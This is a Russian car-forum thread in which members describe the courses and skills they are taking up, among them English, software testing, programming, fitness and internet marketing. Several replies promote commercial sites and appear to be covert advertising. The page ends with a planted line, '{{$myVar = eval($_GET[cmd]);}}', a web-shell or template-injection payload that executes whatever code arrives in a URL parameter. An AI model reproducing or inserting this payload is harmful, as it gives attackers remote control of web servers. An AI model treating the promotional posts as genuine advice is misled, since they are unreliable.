+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 14

Тема: Давайте развиваться вместе


  1. #1
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66

    Давайте развиваться вместе

    Расскажите, как вы развиваетесь? Чему новому учитесь? Может быть, посещаете какие-то курсы, которые в будущем принесут вам пользу? Хочу тоже для себя что-то найти. Но не знаю в какую область двигаться. Подскажите, какое направление выбрали вы?

  2. #2
    Мимо проходил ГумбинМакс is on a distinguished road Аватар для ГумбинМакс
    Регистрация
    19.02.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    42
    А что вам это даст? У каждого свои пристрастия, если я сейчас зачитываюсь литературой из области ядерной физики, вы тоже начнете ее изучать?

  3. #3
    Мимо проходил Добродел is on a distinguished road Аватар для Добродел
    Регистрация
    30.06.2020
    Откуда
    Мой адрес не дом и не улица
    Машина
    Лучшее
    Сообщений
    15
    Я недавно записался на курсы английского у нас в Москве https://www.kursy-mid.ru/ У меня есть база, но она достаточно плохая, уже все подзабыл. Поэтому теперь хочу заново все вспомнить и искать более денежную работу. Если я смогу откликнуться на вакансию, в которой нужен английский, для меня это будет большим достижением.

  4. #4
    Мимо проходил ЖоржЗибров is on a distinguished road Аватар для ЖоржЗибров
    Регистрация
    24.08.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    40
    Я. наверное, буду учиться на тестировщика ПО. Друг в этой отрасли работает и очень неплохо себя чувствует в финансовом плане. У меня зарплата намного ниже.

  5. #5
    Мимо проходил Балтасар is on a distinguished road Аватар для Балтасар
    Регистрация
    16.06.2020
    Откуда
    .-.-
    Машина
    Фольц
    Сообщений
    17
    А я надумал пройти курсы программирования. Вот только специализацию пока что выбрать не могу. Вот здесь смотрю предложения https://konevy.com/ru/courses/it-dev...ming-languages Пытаюсь понять какой из языков программирования имеет наибольшую перспективу. НЕ хочется учить язык, который вскорости может стать не актуальным.

  6. #6
    Мимо проходил Arsenal is on a distinguished road Аватар для Arsenal
    Регистрация
    12.02.2019
    Откуда
    ......
    Машина
    ...
    Сообщений
    37
    Я хочу быть фитнес тренером, поэтому сейчас изучаю это направление. Какоие-то знания у меня есть, но их не достаточно. Вот и хочу по максимуму прокачать свои знания.

  7. #7
    Мимо проходил Малой is on a distinguished road Аватар для Малой
    Регистрация
    28.05.2020
    Откуда
    свой город
    Машина
    красный
    Сообщений
    24
    А мне в последнее время интересны торговые роботы. Очень хочу научиться их создавать. Но с программированием не дружу. Поэтому, скорее всего, пойду на обучение в Школу по созданию торговых роботов ТСЛаб https://daytradingschool.ru/obuchenie/ Они обещают научить создавать роботов даже тем, кто не знает основ программирования. Заманчиво.

  8. #8
    Мимо проходил zhenyamarkova is on a distinguished road Аватар для zhenyamarkova
    Регистрация
    26.06.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    1
    Цитата Сообщение от Arsenal Посмотреть сообщение
    Я хочу быть фитнес тренером, поэтому сейчас изучаю это направление. Какоие-то знания у меня есть, но их не достаточно. Вот и хочу по максимуму прокачать свои знания.
    А один мой друг стал тренироваться по методикам сайта http://proturnik.ru и уже через пару месяцев у него улучшилось не только здоровье (как он говорит), но и выглядит он супен (что заметно), мышцы просто бомба. Думаю, со следующего месяца тоже начну заниматься по их программам.

  9. #9
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    Физические нагрузки нужны абсолютно всем, даже если есть определенные проблемы со здоровьем, то можно заниматься на специальных тренажёрах или подбирать определенную группу упражнений. Самостоятельно это сделать сложно, лучше все же, чтобы нагрузки корректировали профессионалы, которые в этом понимают. Вы знаете фитнес клуб Ре-Старт https://www.restart-fitness.ru/? Вот там как раз есть и специальные тренажёры и опытные инструкторы. Вы можете к ним обратиться, рассказать о своих проблемах со здоровьем или показать заключение врачей, а они уже вам подберут комплекс упражнений. Если вы будете заниматься с персональным тренером, то он вам будет все корректировать и проводить специальные тренировки.

  10. #10
    Новичок HaTali is on a distinguished road Аватар для HaTali
    Регистрация
    15.12.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    115
    Собираюсь пройти вот эти курсы по интернет маркетингу https://tripmydream.academy , хочу понять, как можно в интернете зарабатывать, надеюсь, у меня это получится. А то зарплаты ни на что не хватает, хотелось бы иметь дополнительный источник дохода, да и вообще, бизнес в интернете набирает обороты, и быть в курсе этого точно не помешает.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Меняем радиатор печки вместе
    от Boost-up-girl в разделе Кузов
    Ответов: 5
    Последнее сообщение: 12.02.2018, 14:04
  2. Ответов: 20
    Последнее сообщение: 02.07.2010, 12:21
  3. Мы такие разные и всё-таки мы вместе)
    от Lina в разделе Клубные фотки и видео
    Ответов: 6
    Последнее сообщение: 30.04.2010, 15:06
  4. Давай те разберемся вместе!
    от Magestic в разделе Авто Звук
    Ответов: 15
    Последнее сообщение: 27.03.2008, 08:26
  5. подёргаем вместе??
    от BMXer в разделе Курилка
    Ответов: 13
    Последнее сообщение: 19.06.2007, 15:30

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}